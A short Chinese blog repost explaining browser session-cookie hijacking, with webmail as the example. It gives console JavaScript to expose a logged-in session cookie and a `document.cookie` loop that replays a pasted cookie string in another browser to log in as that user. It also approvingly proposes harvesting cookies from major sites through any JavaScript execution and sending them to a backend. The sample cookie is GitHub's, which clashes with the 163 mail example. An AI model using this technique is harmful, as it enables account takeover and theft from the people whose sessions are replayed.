文章出處
文章列表
首先來一篇好文章,剛好看到的:
沉默中的狂怒 —— Cookie 大噴發---------------- http://www.cnblogs.com/index-html/p/mitm-cookie-sniffer.html#3050493
我就重復一遍啦:
在chrome或者firefox下登陸下163的郵箱;
在控制臺執行js:
new Image().src = "http://push.webmail.mail.163.com";
在控制臺可以看到發送的的請求的RequestHeader的cookie;
把這段cookie保存下來拉:
打開另一個瀏覽器,執行這些代碼;
var cookie = '_octo=GH1.1.1197126241.1409639170; logged_in=yes; dotcom_user=user; user_session=T0fclMsdfsdfv0eTN3-CsYUm2OQVnkMsdfUZLn8ZXJLwE7BTIwMEAInT9fptAn; tz=Asia%2FShanghai; _ga=GA1.2.68662887.1409639170; _gat=1; _gh_sess=eyJzZXNzaW9uX2lkIjoiYjI5ZGFlZGQwNGIwN2U5ZjAzZmUxZTIyYjY3MjA1NDYiLCJjb250ZXh0IjoiLyIsInJlZmVycmFsX2NvZGUiOiJodHRwczovL2dpdGh1Yi5jb20vIn0%3D--d4f09b50437a537b45adc451dc8319ac36aaf5fa'; //把你獲取的cookie放到cookie這個變量去
cookie.split(";").forEach(function(e,i) {
//設置cookie,過期時間為一天;
document.cookie = e+";expired="+new Date(new Date().getTime() + 1000*60*60*24).toGMTString();
});
我們現在再打開mail.163.com;發現登陸進去了;
cookie是用來用戶保存在本地的信息;每一個域名或者對應的子域名會保存這些消息,對保存有效期和大小都有限制,后臺分配的對應cookie都是唯一的,所以只要cookie匹配,就知道是哪一個用戶登陸的。
所以只要用戶了用戶的cookie就相當于有了進入你郵箱或者支付寶或者等等等等的后門;soGood;
也就是說只要在網頁中有任何可以執行JS的機會都可以利用
new Image().src = "http://push.webmail.mail.163.com;
new Image().src = "http://www.baidu.com";
遍歷常見的比較大的網站,然后把劫持的cookie發送到后臺, 我們就可以進行匿名登陸了. so Nice;
算是復習一遍吧;
文章列表
全站熱搜
留言列表
